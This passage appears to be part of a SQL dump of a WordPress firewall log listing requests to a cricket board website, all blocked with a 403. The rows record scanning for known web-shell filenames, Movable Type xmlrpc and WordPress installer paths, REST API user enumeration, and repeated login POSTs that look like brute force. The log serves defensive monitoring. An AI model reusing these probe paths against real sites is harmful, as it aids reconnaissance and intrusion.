Safari\\/534.50\"}','piuL0oID3vTPReK4WrtXxycG',0,1673932549.4847,92,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cgi-bin/MT/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','ets8DfEUYojzKIFh0uX69xaB',0,1673932550.8509,136,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cgi-bin/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','EdS8r3hDt50leJb6vWMkRLy2',0,1673932552.2792,111,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/MT/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','rjKT0oElC3fyNABvkXxbt9zQ',0,1673932553.6084,90,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','TfWAM2XomsQ1VtNCFlizk43x',0,1673932554.9524,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/mtos/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','RH5Vj2o9FvPfa1rm8nlObcS4',0,1673932556.3021,136,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','AYxBPkFvfcGJeXhnM7zOCWoS',0,1673932557.7062,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cms/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','wxqYoi1XEN5esMJTz2HDRBhA',0,1673932559.0216,90,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','voRml2dnZ6T3gUeGPjybf84t',0,1673932560.3515,92,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/blog/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','hBsbDYHeRC941WNix8VX7KjQ',0,1673932561.7072,95,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','psmntJc9RKLaw6uFUy4bEkO1',0,1673932563.0019,126,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cgi/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','WgLQcJBG6iPSzb3hkepRFsAC',0,1673932564.3531,90,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','xsP1QHvpSVrf72Cyqj3ladZE',0,1673932565.6320,102,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','7KaJvIktHc503Soy1XmMFjNi',0,1673932566.9535,124,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','O7nMKz2pdAv6xFEePluXqQNR',0,1673932568.3091,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/pridmag/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','TrQlYGZx9wb4JjWH8d2fAtpz',0,1673932569.6179,105,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/pridmag/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','UgBGluFasLrO9J0feWRjyYH6',0,1673932571.0227,92,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','1Zq2mh7CS5disaboxBlzJp6U',0,1673932572.3368,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','QMnBcfXNG4qSy687xeLrol3k',0,1673932573.6972,96,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','z4R3MOWGpgVPXFU8fyq02NBw',0,1673932574.9896,133,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/wp-pridmag/init.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','z1Sy2c0LhHQTbA5on6JiDlvR',0,1673932576.4313,90,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/gaukingo/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ivLApEFqkPbJXf9ohH15Ijw2',0,1673932577.7612,87,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.28.1\"}','xDNOIrTl7q4WLb9ZYKze2dGa',0,1673932581.1115,91,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','kKYoaxjynsMeZ5zDtdwrRFCp',0,1673932585.0318,96,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','6bhfRopuXgeK5LdQWSFA1aIq',0,1673932586.3951,108,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','av2GMeZh3nkjRfSz48bHcLKP',0,1673932587.7177,130,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/new/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','lFJZXyI1sCdfP3uwnQt4TEN2',0,1673932589.0975,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','igCEj4ovUhDlXtzfIyLT52bq',0,1673932590.4357,138,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/old/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','SqNWLXVZznxUEIGhbwQdOB4H',0,1673932591.8391,92,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','8AmycJd3S95ENGoZnO0iKbCj',0,1673932593.1422,141,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wordpress/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Axn8HNcDzSVk3sgm7vporh4Q',0,1673932594.5106,142,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','por6IC79J8ZX1AM3ScGNVaf2',0,1673932595.8803,113,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/test/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','z1DeHvA9ROUPtuINFBysQ2cq',0,1673932597.3161,150,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','bNkRGSZXAU2aCW3H4eycxp5q',0,1673932598.6782,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/blog/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','13b6x4cw7CnkLgMmsJH2WZvG',0,1673932600.0287,122,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','dZJUDmIiPlnr8tLjvKX5apHC',0,1673932601.4263,100,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cms/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','6s8UNBpTnSwjYxf3OQIgzDva',0,1673932602.7861,87,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Z65x0kcPuQsRNd471yweCaTj',0,1673932604.0604,93,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/web/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','EWPwozxXeZ2ySikFCnpLROfh',0,1673932605.9866,132,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','bKaNVRmkjoqTzX5ihpSDWF7v',0,1673932607.4038,128,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/backup/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ea3o4dvQKxl7cXfnwG9AJONj',0,1673932608.8514,125,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','EMXDw61Vcd5SAquiang049Qz',0,1673932610.1968,138,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/site/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','DyaVbqrp3Y2mU5NAkQ0uOJ7d',0,1673932611.5297,81,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','I7JiRuND0TKnl2BbQVagHwms',0,1673932612.8486,98,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/oldsite/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ZCSwo48YdiTQ1jnrGkBvWyIz',0,1673932614.2561,133,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/Paiement/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','uVrY4jF7kC8za3Q6GyJI1pBT',0,1673932615.6063,112,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/Paiement/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GU2oSFnfHdlAKycZePp8sgjM',0,1673932616.9324,133,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/sandbox/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','9MFZSl10XjNa6b4UH5dKJIgu',0,1673932618.2590,98,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/sandbox/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','vE7Yw1ZBjVtoNpCzGgQJWmIk',0,1673932619.6252,123,'','GET',403,0,700,0,1,'',0),('45.61.188.225',759020769,'','https://yorkshirecricketboard.org.uk//wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','riMqyGa9l2D7JOCUc3TEYBSz',0,1673933696.1834,123,'','GET',403,0,520,0,1,'',0),('143.198.60.142',2412133518,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','KCwdOEAYpe48WlSgxyN7TQjv',0,1673935103.7910,94,'','GET',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4895.86 Safari\\/537.36\"}','IfS7rT3RGHW59qLbXchuVmFN',0,1673936871.7813,995,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/99.0.4844.84 Safari\\/537.36\"}','QxKy7Nszr1EhqjnpMka5FSwP',0,1673944825.5700,207,'','POST',403,0,600,0,1,'',0),('128.199.80.137',2160545929,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5KT0Iat3EfiysU7PX4bGv2o1',0,1673962393.0340,117,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','PjEBc1hlSaeqt0JTDvR2Vir8',0,1673964383.2873,163,'','POST',403,0,600,0,1,'',0),('173.236.168.102',2917967974,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','qb0MAKNt4RpuclwIzjOQWY8a',0,1673975836.7833,476,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','qY76nIFXwSyvMeiJT5cH8QfZ',0,1673984161.3206,149,'','POST',403,0,600,0,1,'',0),('164.132.170.4',2760157700,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','xSiXR0U36hsoKgA5daGMECuy',0,1673987342.6574,177,'','POST',403,0,600,0,1,'',0),('135.125.1.9',2273116425,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','QqlxE6Rd7DybONSkGvIjiMPo',0,1673992114.2161,238,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','BMnYOrj1KxWTuskwgtd8lCUI',0,1673992186.7106,146,'','POST',403,0,600,0,1,'',0),('139.193.90.106',2344704618,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','r6RjAFVzxPKTD23inB4SgmHd',0,1673992946.7011,114,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4758.11 Safari\\/537.36\"}','EiYunrVz0MfGh13jXlIC4HTZ',0,1674020830.3820,170,'','POST',403,0,600,0,1,'',0),('81.88.53.4',1364735236,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','kmHBufwY0GCMEyKXzATZav6F',0,1674027970.5204,170,'','POST',403,0,600,0,1,'',0),('148.72.244.186',2487809210,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','6tsxZWDHobaCKh1vlF2y5eqM',0,1674051461.7264,1529,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','IaVyqDhN9BUSs1LGKeRljFnQ',0,1674059808.7013,134,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hBqnxyb4CEMVLWAotzQj7ZmO',0,1674063177.4643,129,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','ApwJuhBIQXyd6CPFKi7SYL5m',0,1674063193.3335,118,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','3oGT6imQ7ejpAaFxHYbC58kL',0,1674063609.5721,139,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','HhpcEUsnbg7Dxmqlo3GSrLPM',0,1674067197.3311,950,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','o6CiL7QmfYEWDsIXJuHw3FSa',0,1674067227.6842,251,'','POST',403,0,600,0,1,'',0),('78.47.169.111',1311746415,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','QJakLHuztRI6NoBx3cTASe7E',0,1674068262.1738,153,'','GET',403,0,520,0,1,'',0),('78.47.169.111',1311746415,'','https://yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','N2DWwbYoCL9sxt7HdyA80BgV',0,1674068262.5386,145,'','GET',403,0,520,0,1,'',0),('91.107.250.214',1533803222,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','N9UFnf1c0TvmIlsMB43ZeChx',0,1674072646.1425,106,'','GET',403,0,520,0,1,'',0),('91.107.250.214',1533803222,'','https://www.yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','Ar9YnhXi8eBF1fc3bRN0zMjd',0,1674072646.4138,142,'','GET',403,0,520,0,1,'',0),('130.61.143.194',2185072578,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','s8zhRpPkrjAJEwmYiFodfagN',0,1674075782.4316,353,'','GET',403,0,520,0,1,'',0),('91.107.168.128',1533782144,'','https://www.yorkshirecricketboard.org.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8pojJhc5gPR6XAOWTzvYfkeE',0,1674084675.5985,1001,'','GET',403,0,700,0,1,'',0),('91.107.168.128',1533782144,'','https://www.yorkshirecricketboard.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hlbyig3ZKF9Gv6dHXMOmwnrt',0,1674084681.8104,665,'','GET',403,0,700,0,1,'',0),('91.107.168.128',1533782144,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZdOSjzJvRNVl4DX7LxGq5Hhp',0,1674084685.6418,671,'','GET',403,0,700,0,1,'',0),('91.107.168.128',1533782144,'','https://www.yorkshirecricketboard.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 